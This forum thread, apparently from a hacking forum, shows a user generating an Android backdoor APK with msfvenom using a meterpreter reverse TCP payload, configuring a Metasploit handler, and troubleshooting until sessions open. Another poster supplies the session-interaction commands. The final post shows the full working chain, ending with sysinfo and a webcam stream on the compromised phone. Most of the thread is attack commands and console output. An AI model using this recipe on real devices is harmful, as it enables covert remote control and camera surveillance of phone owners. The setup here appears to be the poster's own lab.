Jump to content

meterpreter stuck on OSX metasploit


hackRecorded

Recommended Posts

I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks..

 

msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk

[*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk



No platform was selected, choosing Msf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 8809 bytes



msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.43.128

lhost => 192.168.43.128

msf exploit(handler) > set lport 3344

lport => 3344

msf exploit(handler) > show options



Module options (exploit/multi/handler):



   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------





Payload options (android/meterpreter/reverse_tcp):



   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST  192.168.43.128   yes       The listen address

   LPORT  3344             yes       The listen port





Exploit target:



   Id  Name

   --  ----

   0   Wildcard Target





msf exploit(handler) > exploit

[*] Exploit running as background job 0.



[*] Started reverse TCP handler on 192.168.43.128:3344 

msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1

[*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700

 

Link to comment
Share on other sites

2 minutes ago, hackRecorded said:

I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks..

 


msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk

[*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk



No platform was selected, choosing Msf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 8809 bytes



msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.43.128

lhost => 192.168.43.128

msf exploit(handler) > set lport 3344

lport => 3344

msf exploit(handler) > show options



Module options (exploit/multi/handler):



   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------





Payload options (android/meterpreter/reverse_tcp):



   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LHOST  192.168.43.128   yes       The listen address

   LPORT  3344             yes       The listen port





Exploit target:



   Id  Name

   --  ----

   0   Wildcard Target





msf exploit(handler) > exploit

[*] Exploit running as background job 0.



[*] Started reverse TCP handler on 192.168.43.128:3344 

msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1

[*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700

 

I forgot to active notification of replies

Link to comment
Share on other sites

What is the IP address of the device running Android? Looks like it has a session, have you typed "sessions" and then "sessions -i 1" assuming only one session, the first being the android device. if "192.168.43.1" is the gateway's IP, you may have to port forward or put your computer running metasploit, in a DMZ, but so long as the Android device is over wifi on the same subnet, then you should be ok. It's possible the attack runs, but isn't 100% vulnerable to what you're trying to do though. You might want to also add a filter for bad characters like x00,x0d,x0a, etc, to the binary in msfvenom, just to be safe.

Example:

-b '\x00\xFF'
Link to comment
Share on other sites

5 hours ago, digip said:

What is the IP address of the device running Android? Looks like it has a session, have you typed "sessions" and then "sessions -i 1" assuming only one session, the first being the android device. if "192.168.43.1" is the gateway's IP, you may have to port forward or put your computer running metasploit, in a DMZ, but so long as the Android device is over wifi on the same subnet, then you should be ok. It's possible the attack runs, but isn't 100% vulnerable to what you're trying to do though. You might want to also add a filter for bad characters like x00,x0d,x0a, etc, to the binary in msfvenom, just to be safe.

Example:


-b '\x00\xFF'

this is what I need, my android device IP 192.168.43.1, it's theatering wifi to my macbook with IP 192.168.43.128.. so I run metasploit in my terminal.. I'll try your suggestion.. I will ask again if any further problem.. thank you master..

Link to comment
Share on other sites

solved..  I try to type : session -i 6

msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.101 LPORT=4444 R > apkgue6666.apk

[*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.101 LPORT=4444 R > apkgue6666.apk

 

No platform was selected, choosing Msf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 8812 bytes

 

msf > use exploit multi/handler

[-] Failed to load module: exploit

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

PAYLOAD => android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.186.8.101

LHOST => 192.186.8.101

msf exploit(handler) > set LPORT 4444

LPORT => 4444

msf exploit(handler) > exploit

[*] Exploit running as background job 2.

 

[-] Handler failed to bind to 192.186.8.101:4444:-  -

[*] Started reverse TCP handler on 0.0.0.0:4444 

msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.8.105

[*] Meterpreter session 5 opened (192.168.8.101:4444 -> 192.168.8.105:53588) at 2017-10-20 16:08:14 +0700

[*] Sending stage (69089 bytes) to 192.168.8.105

[*] Meterpreter session 6 opened (192.168.8.101:4444 -> 192.168.8.105:38842) at 2017-10-20 16:09:17 +0700

Interrupt: use the 'exit' command to quit

msf exploit(handler) > exit

[*] You have active sessions open, to exit anyway type "exit -y"

msf exploit(handler) > sessions -i 1

[-] Invalid session identifier: 1

msf exploit(handler) > sessions -i

 

Active sessions

===============

 

  Id  Name  Type                        Information          Connection

  --  ----  ----                        -----------          ----------

  5         meterpreter dalvik/android  u0_a347 @ localhost  192.168.8.101:4444 -> 192.168.8.105:53588 (192.168.8.105)

  6         meterpreter dalvik/android  u0_a347 @ localhost  192.168.8.101:4444 -> 192.168.8.105:38842 (192.168.8.105)

 

msf exploit(handler) > sessions -i 6

[*] Starting interaction with 6...

 

meterpreter > sysinfo

Computer    : localhost

OS          : Android 6.0.1 - Linux 3.4.0-perf-gc14c2d5 (armv7l)

Meterpreter : dalvik/android

meterpreter > webcam_stream -i 2

[*] Starting...

[*] Preparing player...

[*] Opening player at: VLMpJIsx.html

[*] Streaming...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...